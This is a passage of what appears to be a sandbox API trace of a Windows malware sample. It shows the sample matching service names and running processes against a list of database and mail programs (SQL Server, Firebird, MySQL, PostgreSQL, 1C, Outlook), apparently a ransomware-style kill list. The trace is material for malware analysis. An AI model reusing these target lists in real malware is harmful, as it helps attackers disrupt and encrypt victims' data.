lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0046.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0046.751] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0046.751] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0046.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0046.751] lstrlenW (lpString="RpcEptMapper") returned 12 [0046.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.751] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0046.751] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0046.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0046.751] lstrlenW (lpString="RpcSs") returned 5 [0046.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0046.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0046.751] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0046.751] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0046.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0046.751] lstrlenW (lpString="SamSs") returned 5 [0046.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0046.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0046.752] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0046.752] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0046.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0046.752] lstrlenW (lpString="Schedule") returned 8 [0046.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0046.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0046.752] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0046.752] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0046.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0046.752] lstrlenW (lpString="SENS") returned 4 [0046.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0046.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0046.752] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0046.752] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0046.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0046.752] lstrlenW (lpString="ShellHWDetection") returned 16 [0046.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.752] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0046.752] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0046.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0046.752] lstrlenW (lpString="Spooler") returned 7 [0046.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0046.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0046.752] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0046.752] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0046.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0046.752] lstrlenW (lpString="swprv") returned 5 [0046.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0046.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0046.752] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0046.752] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0046.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0046.752] lstrlenW (lpString="SysMain") returned 7 [0046.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0046.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0046.752] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0046.752] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0046.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0046.753] lstrlenW (lpString="Themes") returned 6 [0046.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0046.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0046.753] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0046.753] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0046.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0046.753] lstrlenW (lpString="TrkWks") returned 6 [0046.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0046.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0046.753] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0046.753] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0046.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0046.753] lstrlenW (lpString="UxSms") returned 5 [0046.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0046.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0046.753] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0046.753] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0046.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0046.753] lstrlenW (lpString="VSS") returned 3 [0046.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0046.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0046.753] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0046.753] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0046.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0046.753] lstrlenW (lpString="WdiServiceHost") returned 14 [0046.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0046.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0046.753] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0046.753] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0046.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0046.753] lstrlenW (lpString="WdiSystemHost") returned 13 [0046.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0046.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0046.753] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0046.753] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0046.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0046.753] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0046.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0046.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0046.754] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0046.754] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0046.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0046.754] lstrlenW (lpString="Winmgmt") returned 7 [0046.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0046.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0046.754] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0046.754] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0046.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0046.754] lstrlenW (lpString="WPDBusEnum") returned 10 [0046.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0046.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0046.754] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0046.754] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0046.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0046.754] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3943b50 | out: hHeap=0x600000) returned 1 [0046.754] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c4 [0046.756] Process32FirstW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0046.757] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0046.757] lstrlenW (lpString="System") returned 6 [0046.757] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0046.757] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0046.757] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0046.757] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0046.757] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0046.757] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0046.757] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0046.757] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0046.758] lstrlenW (lpString="smss.exe") returned 8 [0046.758] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0046.758] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0046.758] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0046.758] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0046.758] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0046.758] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0046.758] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0046.758] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.759] lstrlenW (lpString="csrss.exe") returned 9 [0046.759] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0046.759] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0046.759] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0046.759] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0046.759] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0046.759] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0046.759] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0046.759] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0046.760] lstrlenW (lpString="wininit.exe") returned 11 [0046.760] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0046.760] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0046.760] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0046.760] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.760] lstrlenW (lpString="csrss.exe") returned 9 [0046.760] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0046.761] lstrlenW (lpString="winlogon.exe") returned 12 [0046.761] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0046.762] lstrlenW (lpString="services.exe") returned 12 [0046.762] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0046.762] lstrlenW (lpString="lsass.exe") returned 9 [0046.762] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0046.763] lstrlenW (lpString="lsm.exe") returned 7 [0046.763] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.763] lstrlenW (lpString="svchost.exe") returned 11 [0046.763] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.764] lstrlenW (lpString="svchost.exe") returned 11 [0046.764] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.765] lstrlenW (lpString="svchost.exe") returned 11 [0046.765] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.766] lstrlenW (lpString="svchost.exe") returned 11 [0046.766] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.766] lstrlenW (lpString="svchost.exe") returned 11 [0046.766] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0046.767] lstrlenW (lpString="audiodg.exe") returned 11 [0046.767] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.768] lstrlenW (lpString="svchost.exe") returned 11 [0046.768] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.768] lstrlenW (lpString="svchost.exe") returned 11 [0046.768] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0046.769] lstrlenW (lpString="dwm.exe") returned 7 [0046.769] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0046.769] lstrlenW (lpString="explorer.exe") returned 12 [0046.769] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0046.770] lstrlenW (lpString="spoolsv.exe") returned 11 [0046.770] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0046.771] lstrlenW (lpString="taskhost.exe") returned 12 [0046.771] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.771] lstrlenW (lpString="svchost.exe") returned 11 [0046.771] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0046.772] lstrlenW (lpString="taskeng.exe") returned 11 [0046.772] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0046.772] lstrlenW (lpString="taskhost.exe") returned 12 [0046.772] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0046.773] lstrlenW (lpString="challenging.exe") returned 15 [0046.773] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0046.774] lstrlenW (lpString="pgp prix.exe") returned 12 [0046.774] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0046.774] lstrlenW (lpString="user-reno.exe") returned 13 [0046.774] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0046.775] lstrlenW (lpString="aggregate.exe") returned 13 [0046.775] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0046.775] lstrlenW (lpString="dressed.exe") returned 11 [0046.776] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0046.776] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0046.776] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0046.777] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0046.777] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0046.778] lstrlenW (lpString="developing.exe") returned 14 [0046.778] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0046.778] lstrlenW (lpString="supported.exe") returned 13 [0046.778] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0046.779] lstrlenW (lpString="girlstionselect.exe") returned 19 [0046.779] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0046.780] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0046.780] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0046.780] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0046.780] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0046.781] lstrlenW (lpString="eating.exe") returned 10 [0046.781] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0046.781] lstrlenW (lpString="nh_protected.exe") returned 16 [0046.781] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0046.782] lstrlenW (lpString="vulnerability.exe") returned 17 [0046.782] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0046.783] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0046.783] Process32NextW (in: hSnapshot=0x1c4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0046.784] lstrlenW (lpString="ment_lo_animation.exe") returned 